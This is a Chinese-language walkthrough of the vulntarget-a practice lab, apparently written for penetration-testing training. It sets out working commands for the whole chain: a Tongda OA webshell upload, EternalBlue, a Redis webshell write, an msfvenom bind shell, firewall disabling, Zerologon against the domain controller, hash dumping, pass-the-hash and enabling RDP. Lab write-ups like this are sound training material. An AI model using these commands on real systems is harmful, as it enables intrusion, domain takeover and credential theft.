[vulntarget靶场] vulntarget-a
靶场地址:https://github.com/crow821/vulntarget
拓扑结构
![[vulntarget靶场] vulntarget-a_第1张图片](http://img.e-com-net.com/image/info8/54a884113a0f41ecb42e4d315b72c883.jpg)
信息收集
主机发现
netdiscover -r 192.168.127.0/24 -i eth0
![[vulntarget靶场] vulntarget-a_第2张图片](http://img.e-com-net.com/image/info8/ab312a336c964fbaa8633615f341c774.jpg)
端口扫描
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.127.130
![[vulntarget靶场] vulntarget-a_第3张图片](http://img.e-com-net.com/image/info8/567fbb3fb4f642e09037d185de52f740.jpg)
访问目标80,发现为通达oa
WIN7漏洞利用
通达oa后台getshell
默认账号admin,空密码登录后台
![[vulntarget靶场] vulntarget-a_第4张图片](http://img.e-com-net.com/image/info8/8890f62c265a45cf8a85c6a07b9030b4.jpg)
点击系统管理 -> 系统参数设置 -> OA服务设置 找到Webroot目录
![[vulntarget靶场] vulntarget-a_第5张图片](http://img.e-com-net.com/image/info8/e0a7382c10f7477ea86546fb2c6bd27c.jpg)
点击系统管理 -> 附件管理 -> 添加存储目录
![[vulntarget靶场] vulntarget-a_第6张图片](http://img.e-com-net.com/image/info8/620349b510b2425db83bd0c36d50587e.jpg)
点击组织 -> 系统管理员 -> 上传附件
![[vulntarget靶场] vulntarget-a_第7张图片](http://img.e-com-net.com/image/info8/a4d373d83a76422ebd936aa6601a3226.jpg)
上传txt后缀文件,根据windows系统自动去掉.的特性,利用burp抓包修改文件后缀为.php.
![[vulntarget靶场] vulntarget-a_第8张图片](http://img.e-com-net.com/image/info8/848d0e1f8ed943dba11a75fc3897b023.jpg)
文件上传到:http://192.168.127.130/im/2309/528190762.a.php,利用哥斯拉连接
![[vulntarget靶场] vulntarget-a_第9张图片](http://img.e-com-net.com/image/info8/b09a484f61a243bc80946ede53e5765a.jpg)
![[vulntarget靶场] vulntarget-a_第10张图片](http://img.e-com-net.com/image/info8/da50929a2e8044b5ac86db2ede6e9502.jpg)
CVE-2017-0144(永恒之蓝)
除了80端口的通达oa,目标还开放了445端口
msfdb run
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.127.130
run
![[vulntarget靶场] vulntarget-a_第11张图片](http://img.e-com-net.com/image/info8/2e4c9bb64ff74a01a311da587b309aea.jpg)
内网渗透
查看win7网卡信息,发现存在另一个网段
![[vulntarget靶场] vulntarget-a_第12张图片](http://img.e-com-net.com/image/info8/6b48121fdd454a8ebfdcc7435d970f7a.jpg)
添加路由
run post/multi/manage/autoroute
![[vulntarget靶场] vulntarget-a_第13张图片](http://img.e-com-net.com/image/info8/3b48852ba33e465499e3bbe99a47a0d6.jpg)
利用msf的post/windows/gather/arp_scanner模块收集内网存活主机
use post/windows/gather/arp_scanner
set session 1
set rhosts 10.0.20.0/24
![[vulntarget靶场] vulntarget-a_第14张图片](http://img.e-com-net.com/image/info8/563c395ddcc141d08c0f412cb4ec784d.jpg)
利用auxiliary/server/socks_proxy模块开启socks代理
use auxiliary/server/socks_proxy
set version 4a
run
![[vulntarget靶场] vulntarget-a_第15张图片](http://img.e-com-net.com/image/info8/f953d6a34f9e44d3a4a0d855a04329cc.jpg)
修改/etc/proxychains4.conf
![[vulntarget靶场] vulntarget-a_第16张图片](http://img.e-com-net.com/image/info8/00dd90de60c84f128192b1300881c36e.jpg)
利用proxychains4对内网10.0.20.99主机进行端口扫描
proxychains4 nmap -Pn -sT -p21,22,23,80-90,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2601,2604,3128,3306,3311,3312,3389,4440,4848,5432,5560,5900,5901,5902,6082,6379,7001-7010,7778,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,50030,50060,135,139,445,53,88 10.0.20.99
![[vulntarget靶场] vulntarget-a_第17张图片](http://img.e-com-net.com/image/info8/fa62176865314345811e02d483f9c972.jpg)
在80端口发现phpinfo.php,得到网站根目录路径: C:/phpStudy/PHPTutorial/WWW/
![[vulntarget靶场] vulntarget-a_第18张图片](http://img.e-com-net.com/image/info8/7ac03feaaf054c5283a270113df32e0c.jpg)
redis未授权访问,写入webshell
proxychains4 redis-cli -h 10.0.20.99
config set dir 'C:/phpStudy/PHPTutorial/WWW/'
config set dbfilename shell.php
set 1 ""
save
![[vulntarget靶场] vulntarget-a_第19张图片](http://img.e-com-net.com/image/info8/c84fb9b809784b10bf0424ed0cf50e92.jpg)
proxychains4代理,利用哥斯拉连接
proxychains4 java -jar godzilla.jar
![[vulntarget靶场] vulntarget-a_第20张图片](http://img.e-com-net.com/image/info8/6b7631f984ba4edf979491f2d3c8f60c.jpg)
![[vulntarget靶场] vulntarget-a_第21张图片](http://img.e-com-net.com/image/info8/a8691fadc5384e15816adf747427a190.jpg)
关闭win2016防火墙,上传msf生成的bind_shell
netsh advfirewall set allprofiles state off #关闭防火墙
![[vulntarget靶场] vulntarget-a_第22张图片](http://img.e-com-net.com/image/info8/cf0aea1b2a9f4f50b5f125545c9c9c78.jpg)
#msfvenom生成shell
msfvenom -p windows/x64/meterpreter/bind_tcp rhost=10.0.20.99 lport=4444 -f exe -o shell.exe
![[vulntarget靶场] vulntarget-a_第23张图片](http://img.e-com-net.com/image/info8/0a5330d839f24c65a441953e0c1a7543.jpg)
利用哥斯拉上传
![[vulntarget靶场] vulntarget-a_第24张图片](http://img.e-com-net.com/image/info8/c0b57e9cf36845ed9f9a386d54da215b.jpg)
执行
.\shell.exe
![[vulntarget靶场] vulntarget-a_第25张图片](http://img.e-com-net.com/image/info8/0bc60854c83c4c3aa2a16e50b1b337b6.jpg)
msf上线
exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.20.99
run
![[vulntarget靶场] vulntarget-a_第26张图片](http://img.e-com-net.com/image/info8/d53e82e8cb174a16b459d3524279414d.jpg)
win2016上发现另一个网段
![[vulntarget靶场] vulntarget-a_第27张图片](http://img.e-com-net.com/image/info8/43219350108d4f67aee46f2364bc8566.jpg)
添加路由
run post/multi/manage/autoroute
发现win2016加入域,域名:vulntarget.com
![[vulntarget靶场] vulntarget-a_第28张图片](http://img.e-com-net.com/image/info8/0fe26ba65185434592ba35efd24755f0.jpg)
查看域内主机
net group "Domain Computers" /domain
![[vulntarget靶场] vulntarget-a_第29张图片](http://img.e-com-net.com/image/info8/5691268eddb540f6bbe59b2a1520b04f.jpg)
查看域控
net group "Domain Controllers" /domain
![[vulntarget靶场] vulntarget-a_第30张图片](http://img.e-com-net.com/image/info8/86fd4f3aa32c4f8cb57616c53354b6be.jpg)
域控ip:10.0.10.110
ping -n 1 WIN2019
![[vulntarget靶场] vulntarget-a_第31张图片](http://img.e-com-net.com/image/info8/ac7b01f6c4cc421590a2af9e5bdbb06a.jpg)
CVE-2020-1472上线域控
打空域控密码,exp:https://github.com/VoidSec/CVE-2020-1472
proxychains4 python3 cve-2020-1472-exploit.py 域控主机名 域控IP
proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
![[vulntarget靶场] vulntarget-a_第32张图片](http://img.e-com-net.com/image/info8/ae8218c0ead24a5d87e3a15c54f3d3b0.jpg)
dump域控hash
proxychains4 impacket-secretsdump vulntarget.com/win2019\[email protected] -no-pass
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
![[vulntarget靶场] vulntarget-a_第33张图片](http://img.e-com-net.com/image/info8/42923f0c7ca84b3080d12051a5dd584d.jpg)
wmiexec上线
proxychains4 impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 ./[email protected]
net user administrator p-0p-0p-0 /domain #修改域控密码
netsh advfirewall set allprofiles state off #关防火墙
#开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
![[vulntarget靶场] vulntarget-a_第34张图片](http://img.e-com-net.com/image/info8/f896ef97bb44499fabd316d0cba9cffe.jpg)
连接3389
proxychains4 remmina
![[vulntarget靶场] vulntarget-a_第35张图片](http://img.e-com-net.com/image/info8/9499e8a8066441338bb494c835b8485d.jpg)
切换动态分辨率
![[vulntarget靶场] vulntarget-a_第36张图片](http://img.e-com-net.com/image/info8/20b5ac2c5806412cab25be0f8d9685dd.jpg)
![[vulntarget靶场] vulntarget-a_第37张图片](http://img.e-com-net.com/image/info8/f6de2a58b4e44d6da5748b10c1b6c449.jpg)
恢复域控密码
保存注册表
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
![[vulntarget靶场] vulntarget-a_第38张图片](http://img.e-com-net.com/image/info8/d2d7bd204aa84cc58f6a5c28ae97c475.jpg)
下载.save文件到本地解密
lget sam.save
lget security.save
lget system.save
![[vulntarget靶场] vulntarget-a_第39张图片](http://img.e-com-net.com/image/info8/7cbeafc63e4d435c89b828783a502e0e.jpg)
解密
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
![[vulntarget靶场] vulntarget-a_第40张图片](http://img.e-com-net.com/image/info8/07594efaceaf4a55a537c4cdc46fb0a8.jpg)
还原密码
proxychains4 python reinstall_original_pw.py win2019 10.0.10.110 346669a9c17532da61e8b473cb880ff0
![[vulntarget靶场] vulntarget-a_第41张图片](http://img.e-com-net.com/image/info8/8182fd6637e14e8aa5a6566b7080ee5c.jpg)
再次尝试dump域控hash,发现失败,证明已经还原
proxychains4 impacket-secretsdump vulntarget.com/win2019\[email protected] -no-pass
![[vulntarget靶场] vulntarget-a_第42张图片](http://img.e-com-net.com/image/info8/ee1f795a112d4a1990deab8a2df60817.jpg)